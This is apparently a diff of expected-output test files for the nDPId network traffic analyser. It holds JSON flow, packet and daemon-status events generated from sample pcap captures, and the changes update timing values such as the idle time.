00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546078,"flow_last_seen":1031854546078,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","packets-captured":131,"packets-processed":117,"total-skipped-flows":0,"total-l4-data-len":22225,"total-not-detected-flows":3,"total-guessed-flows":27,"total-detected-flows":8,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":206,"global_ts_msec":1031854568982}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 131/117

12
test/results/git.pcap.out
View File

@@ -1,11 +1,11 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1460821630164}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"}
00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460821630164,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1460821630164,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460821630164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630164,"pkt":"nJcm0ghCPJcOZtCOCABFAAA8Q1ZAAEAGScLAqABNBZnnFbt3JMp+hgtEAAAAAKACchB0gwAAAgQFtAQCCAoBp0gSAAAAAAEDAwo="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460821630221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460821630221,"pkt":"PJcOZtCOnJcm0ghCCABFCAA8AABAAC8GnhAFmecVwKgATSTKu3dqwE5VfoYLRaASOJBfrwAAAgQFrAQCCAorjWmrAadIEgEDAwc="}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1460821630222,"pkt":"nJcm0ghCPJcOZtCOCABFAAA0Q1dAAEAGScnAqABNBZnnFbt3JMp+hgtFasBOVoAQAB3G2AAAAQEICgGnSCArjWmr"}
00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1460821630164,"flow_last_seen":1460821630222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":69,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1460821630222,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":90,"flow_first_seen":1460821630164,"flow_last_seen":1460821631269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2880,"flow_tot_l4_payload_len":68049,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1460821631269,"l3_proto":"ip4","src_ip":"192.168.0.77","dst_ip":"5.153.231.21","src_port":47991,"dst_port":9418,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Git","breed":"Safe","category":"Collaborative"}}
00549{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":90,"source":"git.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":90,"total-skipped-flows":0,"total-l4-data-len":68049,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1460821631269}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 90/90

1638
test/results/gnutella.pcap.out
View File

File diff suppressed because it is too large Load Diff

12
test/results/google_ssl.pcap.out
View File

@@ -1,11 +1,11 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"google_ssl.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434443394683}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434443394683,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434443394683,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434443394683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1434443394683,"pkt":"AA6OTbSogMbKAJ6fCABFAAAsBqJAAEAG14usHwPg2DrUZKdTAbt6Z3LqAAAAAGACFtCOVwAAAgQFtA=="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434443394717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434443394717,"pkt":"gMbKAJ6fAA6OTbSoCABFAAAseLYAADMGsnfYOtRkrB8D4AG7p1PuIxETemdy62ASp5T+aAAAAgQFlgAA"}
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"}
